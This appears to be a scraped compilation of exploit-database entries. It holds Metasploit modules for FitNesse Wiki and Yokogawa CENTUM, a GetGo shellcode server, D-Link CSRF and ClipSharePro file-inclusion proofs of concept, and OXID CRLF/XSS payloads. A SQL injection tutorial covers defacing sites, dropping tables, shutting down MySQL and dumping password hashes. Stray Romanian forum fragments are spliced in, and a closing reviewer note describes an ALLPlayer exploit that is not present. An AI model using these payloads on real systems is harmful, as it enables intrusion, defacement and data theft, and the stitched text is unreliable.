# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Review notes:
# - The injection point is the wiki page body: the page is saved with a
#   `!define TEST_RUNNER {...}` line holding the command, and the follow-up
#   GET of the same page with `?test` is what causes it to run (per this
#   module's flow; FitNesse internals are not visible here).
# - Server-side signature, all from one client: GET <WikiWord>?edit, POST the
#   page with responder=saveData and a pageContent containing
#   "!define TEST_RUNNER", GET <WikiWord>?test, then POST ?deletePage.  The
#   cleanup step removes the page, so access logs are the durable evidence.
# - Mitigation per the description: update beyond release 20140201, and do
#   not expose page editing to untrusted clients.

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpClient

  # Module metadata plus the two user options (RPORT, TARGETURI).
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Fitnesse Wiki Remote Command Execution',
      'Description'    => %q{
        This module exploits a vulnerability found in Fitnesse Wiki, version 20140201 and earlier.
      },
      'Author'         =>
        [
          'Jerzy Kramarz', ## Vulnerability discovery
          'Veerendra G.G <veerendragg {at} secpod.com>', ## Metasploit Module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2014-1216' ],
          [ 'OSVDB', '103907' ],
          [ 'BID', '65921' ],
          [ 'URL', 'http://secpod.org/blog/?p=2311' ],
          [ 'URL', 'http://secpod.org/msf/fitnesse_wiki_rce.rb' ],
          [ 'URL', 'http://seclists.org/fulldisclosure/2014/Mar/1' ],
          [ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-1216/' ]
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'       => 1000,
          'BadChars'    => "",
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              ## ##'RequiredCmd' => 'generic telnet',
              ## payloads cmd/windows/adduser and cmd/windows/generic works perfectly
            }
        },
      'Platform'       => %w{ win },
      'Arch'           => ARCH_CMD,
      'Targets'        =>
        [
          ['Windows', { 'Platform' => 'win' } ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Feb 25 2014'))

    register_options(
      [
        Opt::RPORT(80),
        OptString.new('TARGETURI', [true, 'Fitnesse Wiki base path', '/'])
      ], self.class)
  end

  # Fingerprint only: a 200 response whose body contains ">FitNesse<" yields
  # CheckCode::Detected (the version is never inspected, so this does not
  # return Vulnerable); anything else is Safe.
  def check
    print_status("#{peer} - Trying to detect Fitnesse Wiki")
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path)
    })
    if res && res.code == 200 && res.body.include?(">FitNesse<")
      print_good("#{peer} - FitNesse Wiki Detected!")
      return Exploit::CheckCode::Detected
    end
    return Exploit::CheckCode::Safe
  end

  # Create a throw-away WikiWord page whose content defines TEST_RUNNER as
  # `command`, request it with ?test, then delete it.
  #
  # command - String inserted verbatim inside `!define TEST_RUNNER {...}`
  #           (presumably a '}' inside it would end the define early — not
  #           verified here).
  #
  # Returns nil.  Calls fail_with when the initial ?edit request does not
  # return 200; prints an error and returns, without failing the run, when the
  # editTime/ticketId hidden fields cannot be parsed from that page.  The
  # responses to the save, test and delete requests are only reported, never
  # acted on.
  def http_send_command(command)
    ## Construct random page in WikiWord format
    uri = normalize_uri(target_uri.path, 'TestP' + rand_text_alpha_lower(7))
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => uri + "?edit"
    })
    if !res || res.code != 200
      fail_with(Failure::Unknown, "#{peer} - Unexpected response, exploit probably failed!")
    end

    print_status("#{peer} - Retrieving edit time and ticket id")
    ## Get Edit Time and Ticket Id from the response
    ## ($1 is the whole digit run; the inner (\d) group is redundant)
    res.body =~ /"editTime" value="((\d)+)"/
    edit_time = $1
    res.body =~ /"ticketId" value="((-?\d)+)"/
    ticket_id = $1

    ## Validate we are able to extract Edit Time and Ticket Id
    if !edit_time or !ticket_id
      print_error("#{peer} - Failed to get Ticket Id / Edit Time.")
      return
    end

    print_status("#{peer} - Attempting to create '#{uri}'")
    ## Construct Referer
    referer = "http://#{rhost}:#{rport}" + uri + "?edit"
    ## Construct command to be executed
    page_content = '!define COMMAND_PATTERN {%m} !define TEST_RUNNER {' + command + '}'
    print_status("#{peer} - Injecting the payload")

    ## Construct POST request to create page with malicious commands
    ## inserted in the page
    res = send_request_cgi(
      {
        'uri'       => uri,
        'method'    => 'POST',
        'headers'   => {'Referer' => referer},
        'vars_post' => {
          'editTime'    => edit_time,
          'ticketId'    => ticket_id,
          'responder'   => 'saveData',
          'helpText'    => '',
          'suites'      => '',
          '__EDITOR__1' => 'textarea',
          'pageContent' => page_content,
          'save'        => 'Save',
        }
      })
    if res && res.code == 303
      print_status("#{peer} - Successfully created '#{uri}' with payload")
    end

    ## Execute inserted command
    print_status("#{peer} - Sending exploit request")
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => uri + "?test"
    })
    if res && res.code == 200
      print_status("#{peer} - Successfully sent exploit request")
    end

    ## Cleanup by deleting the created page (response not checked)
    print_status("#{peer} - Execting cleanup routine")
    referer = "http://#{rhost}:#{rport}" + uri + "?deletePage"
    res = send_request_cgi(
      {
        'uri'       => uri + "?deletePage",
        'method'    => 'POST',
        'headers'   => {'Referer' => referer},
        'vars_post' => {
          'confirmed' => 'Yes',
        }
      })
  end

  # Entry point: hands the encoded command payload to http_send_command.
  def exploit
    http_send_command(payload.encoded)
  end
end
Mi se poate afla usor IP-ul (real)? (Tor + Hotspot Shield)
Depinde cine vrea sa te gaseasca... Daca vrea colegul tau Ion de la 3, care-i place foarte mult cs-u si sta 17/24 pe feisbuc nu prea are sanse, dar daca ai facut nasoale, sansele sa te prinda cresc. -
# Exploit Title: OXID eShop v<4.7.11/5.0.11 + v<4.8.4/5.1.4 Multiple Vulnerabilities # Google Dork: - # Date: 12/2013 # Exploit Author: //sToRm # Author mail: storm@sicherheit-online.org # Vendor Homepage: http://www.oxid-esales.com # Software Link: - # Version: All versions < 4.7.11/5.0.11 + All versions < 4.8.4/5.1.4 # Tested on: Multiple platforms # CVE : CVE-2014-2016 + CVE-2014-2017 (reserved) ########################################################################################################### # XSS vulnerability ####################################################################################### Under certain circumstances, an attacker can trick a user to enter a specially crafted URI or click on a mal-formed link to exploit a cross-site scripting vulnerability that theoretically can be used to gain unauthorized access to a user account or collect sensitive information of this user. SAMPLE: ------------------------------------------------------------------------------- http://HOST/tag/sample/sample-name.html?cur=2&listtype=tag&pgNr=2&searchtag=[XSS] --------------------------------------------------------------------------------------- Products: OXID eShop Enterprise Edition OXID eShop Professional Edition OXID eShop Community Edition Releases: All previous releases Platforms: All releases are affected on all platforms. STATE - Resolved in OXID eShop version 4.7.11/5.0.11. and OXID eShop version 4.8.4/5.1.4. - A fix for OXID eShop version 4.6.8 is available. 
Bulletin: http://wiki.oxidforge.org/Security_bulletins/2014-001 ########################################################################################################### ########################################################################################################### ########################################################################################################### # Multiple CRLF injection / HTTP response splitting ####################################################### Under certain circumstances (depending on the browser, OS, PHP-Version), an attacker can trick a user to enter a specially crafted URI or click on a mal-formed link to exploit a HTTP response splitting vulnerability that theoretically can be used to poison cache, gain unauthorized access to a user account or collect sensitive information of this user. A possible exploit by passing such a mal-formed URI could lead to: - return of a blank page or a PHP error (depending on one's server configuration) - set unsolicited browser cookies Products: OXID eShop Enterprise Edition OXID eShop Professional Edition OXID eShop Community Edition Releases: All previous releases Platforms: All releases are affected on all platforms. STATE: - Resolved in OXID eShop version 4.7.11/5.0.11. and OXID eShop version 4.8.4/5.1.4. - A fix for OXID eShop version 4.6.8 is available. 
Bulletin: http://wiki.oxidforge.org/Security_bulletins/2014-002 Vulnerability details: ########################################################################################################### # 1 # CRLF injection / HTTP response splitting ############################################################ PATH: ROOT/index.php PARAMETER: anid CONCEPT: -------------------------------------------------------------------------------------------------- actcontrol=start &aid=1 &am=1 &anid=%0d%0a%20[INJECT:INJECT] &cl=start &fnc=tobasket ?=0 &pgNr=0 &stoken=1 ----------------------------------------------------------------------------------------------------------- SAMPLE: --- POST /index.php HTTP/1.1 ------------------------------------------------------------------------------ actcontrol=start&aid=1&am=1&anid=%0d%0a%20INJECTED:INJECTED_DATA&cl=start&fnc=tobasket?=0&pgNr=0&stoken=1 ----------------------------------------------------------------------------------------------------------- ########################################################################################################### ########################################################################################################### ########################################################################################################### # 2 # CRLF injection / HTTP response splitting ############################################################ PATH: ROOT/index.php PARAMETER: cnid CONCEPT: -------------------------------------------------------------------------------------------------- actcontrol=details &aid=1 &am=1 &anid=0 &cl=details &cnid=%0d%0a%20[INJECTED:INJECTED] &fnc=tobasket ?=0 &listtype=list &panid= &parentid=1 &stoken=1 &varselid%5b0%5d= ----------------------------------------------------------------------------------------------------------- SAMPLE: --- POST /index.php HTTP/1.1 ------------------------------------------------------------------------------ 
actcontrol=details&aid=1&am=1&anid=0&cl=details&cnid=%0d%0a%20INJECTED:INJECTED_DATA&fnc=tobasket?=0&listtype=list&panid=&parentid=1&stoken=1&varselid%5b0%5d= ----------------------------------------------------------------------------------------------------------- ########################################################################################################### ########################################################################################################### ########################################################################################################### # 3 # CRLF injection / HTTP response splitting ############################################################ PATH: ROOT/index.php PARAMETER: listtype CONCEPT: -------------------------------------------------------------------------------------------------- actcontrol=details &aid=1 &am=1 &anid=0 &cl=details &cnid=0 &fnc=tobasket ?=0 &listtype=%0d%0a%20[INJECTED:INJECTED] &panid= &parentid=0 &stoken=0 &varselid%5b0%5d= ----------------------------------------------------------------------------------------------------------- SAMPLE: --- POST /index.php HTTP/1.1 ------------------------------------------------------------------------------ actcontrol=details&aid=1&am=1&anid=0&cl=details&cnid=0&fnc=tobasket?=0&listtype=%0d%0a%20INJECTED:INJECTED_DATA&panid=&parentid=0&stoken=0&varselid%5b0%5d= ----------------------------------------------------------------------------------------------------------- ########################################################################################################### ########################################################################################################### Many greetings to all lunatics and freaks out there who live daily in the code like me and my partners. A thanks to the developers who have responded relatively quickly. Cheers! //sToRm source
#################################################################################### # Exploit Title: Dlink DIR-600L Hardware Version AX Firmware Version 1.00 CSRF Vulnerability # Google Dork: N/A # Date: 20/03/2014 # Exploit Author: Dhruv Shah # Vendor Homepage: http://www.dlink.com/us/en/home-solutions/connect/routers/dir-600l-wireless-n-150-home-cloud-router # Software Link: N/A # Hardware Version:E4 # Firmware Version:5.10 # Tested on: Router Web Server # CVE : N/A ################################################################################### Cross Site Request Forgery This Modem's Web Application , suffers from Cross-site request forgery through which attacker can manipulate user data via sending him malicious craft url. The Modems's Application not using any security token to prevent it against CSRF. You can manipulate any userdata. PoC and Exploit to change user password: In the POC the IP address in the POST is the modems IP address. <html> <body> <form id ="poc" action="http://192.168.0.1/goform/formSetPassword" method="POST"> <input type="hidden" name="settingsChanged" value="1" /> <input type="hidden" name="config.login_name" value="admin" /> <input type="hidden" name="config.password" value="YWRtaW4A" /> <input type="hidden" name="config.web_server_allow_graphics_auth" value="false" /> <input type="hidden" name="config.web_server_allow_wan_http" value="false" /> <input type="hidden" name="config.web_server_wan_port_http" value="8080" /> <input type="hidden" name="config.wan_web_ingress_filter_name" value="" /> <input type="hidden" name="wan_ingress_filter_details" value="" /> </form> </body> <script type="text/javascript"> document.getElementById("poc").submit(); </script> </html> ______________________ *Dhruv Shah* *aka Snypter* Blogger | Researcher | Consultant | Writer Youtube <http://www.youtube.com/snypter> | Facebook<http://www.facebook.com/dhruvshahs>| Linkedin <http://in.linkedin.com/pub/dhruv-shah/26/4a6/aa0> | 
Twitter<https://twitter.com/Snypter>| Blog <http://security-geek.in/blog/> source
Toate parolele vor fi afisate in clear text.
# Defender note (review): the target is the BKHOdeq.exe service reached over TCP port 20171
# (the RPORT option below). check() sends a 16-byte header whose length field is 0xffffffff and
# treats a 4-byte reply with result code 0 as "detected"; exploit() sends a body of 8660 bytes
# plus an SEH record. A request to that port advertising a 0xffffffff data length, or a request
# body of roughly 8.6 KB or more, is a usable detection signal at the network boundary. Vendor
# advisory YSAR-14-0001E (see References) is the fix reference. As pasted here the listing is
# collapsed onto three lines, so inline `#` comments run into the code that followed them and the
# text is not loadable as shown.
## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'Yokogawa CENTUM CS 3000 BKHOdeq.exe Buffer Overflow', 'Description' => %q{ This module exploits a stack based buffer overflow in Yokogawa CENTUM CS 3000. The vulnerability exists in the service BKHOdeq.exe when handling specially crafted packets. This module has been tested successfully on Yokogawa CENTUM CS 3000 R3.08.50 over Windows XP SP3 and Windows 2003 SP2. }, 'Author' => [ 'juan vazquez', 'Redsadic <julian.vilas[at]gmail.com>' ], 'References' => [ [ 'URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf' ], [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2014/03/10/yokogawa-centum-cs3000-vulnerabilities' ] ], 'Payload' => { 'Space' => 6000, 'DisableNops' => true, 'BadChars' => ":\r\n" }, 'Platform' => 'win', 'Targets' => [ [ 'Yokogawa CENTUM CS 3000 R3.08.50 / Windows [ XP SP3 / 2003 SP2 ]', { 'Ret' => 0x0042068e, # stackpivot from 2488 BKHOdeq.exe # ADD ESP,9B8 # RETN 'Offset' => 8660, 'StackPivotAdjustment' => 108 } ] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', 'WfsDelay' => 10 }, 'DisclosureDate' => 'Mar 10 2014', 'DefaultTarget' => 0)) register_options( [ # Required for EIP offset Opt::RPORT(20171) ], self.class) end def check # It forces an huge allocation, which should fail, # and return back an error answer from the server # while parsing the packet header. 
pkt = build_pkt(0xffffffff) res = send_pkt(pkt) if valid_response?(res) return Exploit::CheckCode::Detected end Exploit::CheckCode::Safe end def exploit my_payload = payload.encoded rop_chain = create_rop_chain data = rand_text(target['StackPivotAdjustment']) data << rop_chain data << stack_adjust data << my_payload data << rand_text(target['Offset'] - data.length) data << generate_seh_record(target.ret) pkt = build_pkt(data.length, data) print_status("Trying target #{target.name}, sending #{pkt.length} bytes...") connect sock.put(pkt) disconnect end def build_pkt(data_length, data = "") header = rand_text(4) # iMark header << [data_length].pack("N") # Data length header << rand_text(4) # NumSet header << rand_text(2) # req header << rand_text(2) # Unknown pkt = header + data pkt end def send_pkt(data) connect sock.put(data) res = sock.get_once disconnect res end def valid_response?(data) return false unless data return false unless data.length == 4 return false unless result_code(data) == 0 true end def result_code(data) data.unpack("N").first end def stack_adjust adjust = "\x64\xa1\x18\x00\x00\x00" # mov eax, fs:[0x18 # get teb adjust << "\x83\xC0\x08" # add eax, byte 8 # get pointer to stacklimit adjust << "\x8b\x20" # mov esp, [eax] # put esp at stacklimit adjust << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset adjust end def create_rop_chain # rop chain generated with mona.py - www.corelan.be rop_gadgets = [ 0x63b27a60, # RET # padding on XP SP3 0x63b27a60, # RET # padding on XP SP3 0x63b27a5f, # POP EAX # RETN [libbkhMsg.dll] 0x61e761e0, # ptr to &VirtualAlloc() [IAT LibBKCCommon.dll] 0x61e641e4, # MOV EAX,DWORD PTR DS:[EAX] # RETN [LibBKCCommon.dll] 0x00405522, # PUSH EAX # TEST EAX,C0330042 # POP ESI # ADD ESP,6D8 # RETN [BKHOdeq.exe] ].flatten.pack("V*") rop_gadgets << rand_text(1752) # Padding because of the "ADD ESP,6D8" instr rop_gadgets << [ 0x61e62aa4, # POP EBP # RETN [LibBKCCommon.dll] 0x61e648c0, # & push esp # ret 
[LibBKCCommon.dll] 0x66f3243f, # POP EBX # RETN [libBKBEqrp.dll] 0x00000001, # 0x00000001-> ebx 0x61e729dd, # POP EDX # MOV EAX,5E5FFFFF # RETN [LibBKCCommon.dll] 0x00001000, # 0x00001000-> edx 0x63a93f6f, # POP ECX # RETN [libbkhopx.dll] 0x00000040, # 0x00000040-> ecx 0x63ad1f6a, # POP EDI # RETN [libbkhOdeq.dll] 0x63dd3812, # RETN (ROP NOP) [libbkhCsSrch.dll] 0x61e60b4c, # POP EAX # RETN [LibBKCCommon.dll] 0x90909090, # nop 0x63ae5cc3, # PUSHAD # RETN [libbkhOdbh.dll] ].flatten.pack("V*") rop_gadgets end end source
MODIFYING SITE CONTENT: --------------------------------------------------- Sometime, u find the vulnerable site and get evrything to know but maybe admin login doesn't exist or it is accessible for certain IP range. Even in that context, u can use some kewl SQL commands for modifying the site content. I haven't seen much articles addressing this one so thought to include it here. Here, I will basically talk about few SQL commands u may use to change the site content. Therse commands are the workhorse of MySQL & are deadly when executed. ---->First let me list these commands: UPDATE: It is used to edit infos already in the db without deleting any rows. DELETE: It is used to delete the contents of one or more fields. DROP: It is used completely delete a table & all its associated data. Now, u could have figured out that these commands can be very desctructive if the site lets us to interact with db with no sanitization & proper permission. --------------------------------------------------------------------------------------------------------------------------------------------- Command Usage: ************** 1).UPDATE: Our vulnerable page is: http://www.site.com/article.php?id=5 Lets say the query is: SELECT title,data,author FROM article WHERE id=5 Though in reality, we don'By executing first query, we have set the title value as 'Hacked by x @ rstforums.com' in the table article while in second query, we have updated all three fields title, data, & author in the table article. Sometimes, u may want to change the specific page with id=5. For this u will do: http://www.site.com/article.php?id=5 UPDATE article SET title='value 1',data='value 2',author='value 3' WHERE id=5/*t know the query as above, we can find the table and column name as discussed earlier. 
So we would do: http://www.site.com/article.php?id=5 UPDATE article SET title='Hacked by x @ rstforums.com'/* or, u could alternatively do: http://www.site.com/article.php?id=5 UPDATE article SET title='Hacked by x @ rstforums.com',data='Ur site has zero security',author='Hacked by x @ rstforums.com'/* By executing first query, we have set the title value as 'Hacked by x @ rstforums.com' in the table article while in second query, we have updated all three fields title, data, & author in the table article. Sometimes, u may want to change the specific page with id=5. For this u will do: http://www.site.com/article.php?id=5 UPDATE article SET title='value 1',data='value 2',author='value 3' WHERE id=5/* --------------------------------------------------------------------------------------------------------------------------------- 2).DELETE: As already stated, this deletes the content of one or more fields permanently from the db server. The syntax is: http://www.site.com/article.php?id=5 DELETE title,data,author FROM article/* or if u want to delete these fields from the id=5, u will do: http://www.site.com/article.php?id=5 DELETE title,data,author FROM article WHERE id=5/* ---------------------------------------------------------------------------------------------------------------------------------- 3).DROP: This is another deadly command u can use. With this, u can delete a table & all its associated data. For this, we make our URL as: http://www.site.com/article.php?id=5 DROP TABLE article/* This would delete table article & all its contents. ---------------------------------------------------------------------------------------------------------------------------------------- 4).SHUTTING DOWN MySQL SERVER: This is like DoSing the server as it will make the MySQL resources unavailable for the legitimate users or site visitors... For this, you will be using: SHUTDOWN WITH NOWAIT; So, you would craft a query which would execute the above command... 
For example, in my case, I would do the following: http://www.site.com/article.php?id=5 SHUTDOWN WITH NOWAIT; WOW! the MySQL server is down... This would prevent legitimate users & site visitors from using or viewing MySQL resources... ---------------------------------------------------------------------------------------------------------------------------------------------- 5).LOADFILE: MySQL has a function called load_file which you can use for your benefits again.. I have not seen much site where I could use this function... I think we should have MySQL root privilege for this.... Also, the magic quotes should be off for this.. But there is a way to get past the magic quotes... load_file can be used to load certain files of the server such as .htaccess, .htpasswd, etc.. & also password files like etc/passwd, etc.. Do something like below: http://www.site.com/article.php?id=5 UNION ALL SELECT load_file('etc/passwd'),2/* But sometimes, you will have to hex the part & do something like below: http://www.site.com/article.php?id=5 UNION ALL SELECT load_file(0x272F6574632F70617373776427) where I have hexed... Now, if we are lucky, the scriptblock would echo the etc/passwd in the result.. ------------------------------------------------------------------------------------------------------------------------------- 6).MySQL ROOT: If the MySQL version is 5 or above, we might be able to gain MySQL root privilege which will again be helpful for us.. MySQL servers from version 5 have a table called mysql.user which contains the hashes & usernames for login... It is in the user table of the mysql database which ships with every installation of MySQL.. For this, you will do: http://www.site.com/article.php?id=5 UNION ALL SELECT concat(username,0x3a,password),2 from mysql.user/* Now you will get the usernames & hashes.. The hash is mysqlsha1... Quick note: JTR won't crack it.. But InsidePro Password Recovery Software has one to do it.. 
--------------------------------------------------------------------------------------------------------------------------------- 7).FINALIZING THE INJECTION TUTORIAL: Also for all sql injectors, think in a broad way.. & hexing is an important part in sql injection.. Sometimes the things that can't be done with normal ways can be done by using the hex part.. & be sure to try things with char(), hex() functions.. With these, you can bypass magic quotes on the server.. Again, within the UNION statement, you may try to use the XSS which would be sometimes helpful for you.. http://www.site.com/article.php?id=5 UNION ALL SELECT <scblockedript>alert("XSS via SQL injection");</scblockedript>,2/* Again in the above injection, you may require to hex up the javascriptblock part for bypassing the magic quotes.. Also for starters & those who know little things, you may setup a MySQL server & configure PHP for your apache server in your localhost where you can try different things.. In the command line interface of MySQL, try various commands enlisted below.. Try by modifying them... This would help you improve your MySQL command knowledge.. Also try to see how PHP codes interact with MySQL server.. For example, install some free forums like PHPBB, SMF,etc.. or some content management system as it would help you in two ways.. First, you would learn how the PHP interacts with MySQL.. You may check MySQL folder with what changes has occured after installing them. -------------------------------------------------------------------------------------------------------------------------------------- 8).MAJOR MySQL COMMANDS: Below, I would list some major MySQL commands that might help you a lot... Play with them in different ways by setting up a MySQL server in your computer.. 
ABORT -- abort the current transaction ALTER DATABASE -- change a database ALTER GROUP -- add users to a group or remove users from a group ALTER TABLE -- change the definition of a table ALTER TRIGGER -- change the definition of a trigger ALTER USER -- change a database user account ANALYZE -- collect statistics about a database BEGIN -- start a transaction block CHECKPOINT -- force a transaction log checkpoint CLOSE -- close a cursor CLUSTER -- cluster a table according to an index COMMENT -- define or change the comment of an object COMMIT -- commit the current transaction COPY -- copy data between files and tables CREATE AGGREGATE -- define a new aggregate function CREATE CAST -- define a user-defined cast CREATE CONSTRAINT TRIGGER -- define a new constraint trigger CREATE CONVERSION -- define a user-defined conversion CREATE DATABASE -- create a new database CREATE DOMAIN -- define a new domain CREATE FUNCTION -- define a new function CREATE GROUP -- define a new user group CREATE INDEX -- define a new index CREATE LANGUAGE -- define a new procedural language CREATE OPERATOR -- define a new operator CREATE OPERATOR CLASS -- define a new operator class for indexes CREATE RULE -- define a new rewrite rule CREATE SCHEMA -- define a new schema CREATE SEQUENCE -- define a new sequence generator CREATE TABLE -- define a new table CREATE TABLE AS -- create a new table from the results of a query CREATE TRIGGER -- define a new trigger CREATE TYPE -- define a new data type CREATE USER -- define a new database user account CREATE VIEW -- define a new view DEALLOCATE -- remove a prepared query DECLARE -- define a cursor DELETE -- delete rows of a table DROP AGGREGATE -- remove a user-defined aggregate function DROP CAST -- remove a user-defined cast DROP CONVERSION -- remove a user-defined conversion DROP DATABASE -- remove a database DROP DOMAIN -- remove a user-defined domain DROP FUNCTION -- remove a user-defined function DROP GROUP -- remove a user group DROP INDEX 
-- remove an index DROP LANGUAGE -- remove a user-defined procedural language DROP OPERATOR -- remove a user-defined operator DROP OPERATOR CLASS -- remove a user-defined operator class DROP RULE -- remove a rewrite rule DROP SCHEMA -- remove a schema DROP SEQUENCE -- remove a sequence DROP TABLE -- remove a table DROP TRIGGER -- remove a trigger DROP TYPE -- remove a user-defined data type DROP USER -- remove a database user account DROP VIEW -- remove a view END -- commit the current transaction EXECUTE -- execute a prepared query EXPLAIN -- show the execution plan of a statement FETCH -- retrieve rows from a table using a cursor GRANT -- define access privileges INSERT -- create new rows in a table LISTEN -- listen for a notification LOAD -- load or reload a shared library file LOCK -- explicitly lock a table MOVE -- position a cursor on a specified row of a table NOTIFY -- generate a notification PREPARE -- create a prepared query REINDEX -- rebuild corrupted indexes RESET -- restore the value of a run-time parameter to a default value REVOKE -- remove access privileges ROLLBACK -- abort the current transaction SELECT -- retrieve rows from a table or view SELECT INTO -- create a new table from the results of a query SET -- change a run-time parameter SET CONSTRAINTS -- set the constraint mode of the current transaction SET SESSION AUTHORIZATION -- set the session user identifier and the current user identifier of the current session SET TRANSACTION -- set the characteristics of the current transaction SHOW -- show the value of a run-time parameter START TRANSACTION -- start a transaction block TRUNCATE -- empty a table UNLISTEN -- stop listening for a notification UPDATE -- update rows of a table VACUUM -- garbage-collect and optionally analyze a database. // Tutorial gasit intr-un txt vechi, modificat, restructurat.
# Defender note (review): this listing is a malicious HTTP *server*, not a client. It binds
# host:port (192.168.0.1:80 as written), waits for a single connection and answers with an
# "HTTP/1.1 200 " status line whose reason phrase is 4107 bytes of padding (junk0) followed by an
# SEH overwrite and shellcode; a status line of that length from any server is a usable
# detection signal on a proxy or IDS. Affected version per the header is GetGo Download Manager
# v4.9.0.1982 (CVE-2014-2206); mitigation is moving past the affected version once a vendor fix
# is available. As pasted here the code is collapsed onto two lines, so the shebang's `#`
# swallows the whole first line and the text is not runnable as shown.
#!/usr/bin/python # Exploit Title: GetGo Download Manager HTTP Response Header Buffer Overflow Remote Code Execution # Version: v4.9.0.1982 # CVE: CVE-2014-2206 # Date: 2014-03-09 # Author: Julien Ahrens (@MrTuxracer) # Homepage: http://www.rcesecurity.com # Software Link: http://www.getgosoft.com # Tested on: WinXP SP3-GER # # Howto / Notes: # SEH overwrite was taken from outside of loaded modules, because all modules are SafeSEH-enabled # from socket import * from time import sleep from struct import pack host = "192.168.0.1" port = 80 s = socket(AF_INET, SOCK_STREAM) s.bind((host, port)) s.listen(1) print "\n[+] Listening on %d ..." % port cl, addr = s.accept() print "[+] Connection accepted from %s" % addr[0] junk0 = "\x90" * 4107 nseh = "\x90\x90\xEB\x06" seh=pack('<L',0x00280b0b) # call dword ptr ss:[ebp+30] [SafeSEH Bypass] nops = "\x90" * 50 # windows/exec CMD=calc.exe # Encoder: x86/shikata_ga_nai # powered by Metasploit # msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00\x0a\x0d' shellcode = ("\xda\xca\xbb\xfd\x11\xa3\xae\xd9\x74\x24\xf4\x5a\x31\xc9" + "\xb1\x33\x31\x5a\x17\x83\xc2\x04\x03\xa7\x02\x41\x5b\xab" + "\xcd\x0c\xa4\x53\x0e\x6f\x2c\xb6\x3f\xbd\x4a\xb3\x12\x71" + "\x18\x91\x9e\xfa\x4c\x01\x14\x8e\x58\x26\x9d\x25\xbf\x09" + "\x1e\x88\x7f\xc5\xdc\x8a\x03\x17\x31\x6d\x3d\xd8\x44\x6c" + "\x7a\x04\xa6\x3c\xd3\x43\x15\xd1\x50\x11\xa6\xd0\xb6\x1e" + "\x96\xaa\xb3\xe0\x63\x01\xbd\x30\xdb\x1e\xf5\xa8\x57\x78" + "\x26\xc9\xb4\x9a\x1a\x80\xb1\x69\xe8\x13\x10\xa0\x11\x22" + "\x5c\x6f\x2c\x8b\x51\x71\x68\x2b\x8a\x04\x82\x48\x37\x1f" + "\x51\x33\xe3\xaa\x44\x93\x60\x0c\xad\x22\xa4\xcb\x26\x28" + "\x01\x9f\x61\x2c\x94\x4c\x1a\x48\x1d\x73\xcd\xd9\x65\x50" + "\xc9\x82\x3e\xf9\x48\x6e\x90\x06\x8a\xd6\x4d\xa3\xc0\xf4" + "\x9a\xd5\x8a\x92\x5d\x57\xb1\xdb\x5e\x67\xba\x4b\x37\x56" + "\x31\x04\x40\x67\x90\x61\xbe\x2d\xb9\xc3\x57\xe8\x2b\x56" + "\x3a\x0b\x86\x94\x43\x88\x23\x64\xb0\x90\x41\x61\xfc\x16" + 
"\xb9\x1b\x6d\xf3\xbd\x88\x8e\xd6\xdd\x4f\x1d\xba\x0f\xea" + "\xa5\x59\x50") payload = junk0 + nseh + seh + nops + shellcode buffer = "HTTP/1.1 200 "+payload+"\r\n" print cl.recv(1000) cl.send(buffer) print "[+] Sending buffer: OK\n" sleep(3) cl.close() s.close() source
# Exploit Title : ClipSharePro <= 4.1 Local File Inclusion # Date : 2013/3/9 # Exploit Author : Saadat Ullah - saadi_linux[at]rocketmail[dot]com # Software Link : http://www.clip-share.com # Author HomePage: http://security-geeks.blogspot.com # Tested on: Server : Apache/2.2.15 PHP/5.3.3 #Local File Inclusion ClipSharePro is a paid YouTube clone script that suffers from a local file inclusion vulnerability through which an attacker can include arbitrary files in the web app. LFI in ubr_link_upload.php PoC code if($MULTI_CONFIGS_ENABLED){ if(isset($_GET['config_file']) && strlen($_GET['config_file']) > 0){ $config_file = $_GET['config_file']; } else{ showAlertMessage("<font color='red'>ERROR</font>: Failed to find config_file parameter", 1); } } else{ $config_file = $DEFAULT_CONFIG; } // Load config file require $config_file; //including arbitrary file $_GET['config_file'] echo $config_file; The vulnerability can be exploited as follows: http://localhost/clips/ClipSharePro/ubr_link_upload.php?config_file=/etc/passwd For successful exploitation of this vulnerability you need $MULTI_CONFIGS_ENABLED to be 1 in the config file. In ubr_ini.php $MULTI_CONFIGS_ENABLED = 1; ---> this value has to be 1 #Independent Pakistani Security Researcher source
# Defender note (review): file-format exploit for ALLPlayer 2.8.1 on Windows 7 SP1 (per the
# target list). The generated .m3u holds a single playlist entry beginning with "http://"
# followed by a 301-byte offset, a 2-byte return address, the encoded payload and 10000 bytes of
# upper-case padding used to raise the exception; a playlist line of that size is an easy static
# detection signal, and the BID/EDB/OSVDB entries in References identify the advisories. As
# pasted here the listing is collapsed onto two lines, so inline `#` comments run into the code
# that followed them and the text is not loadable as shown.
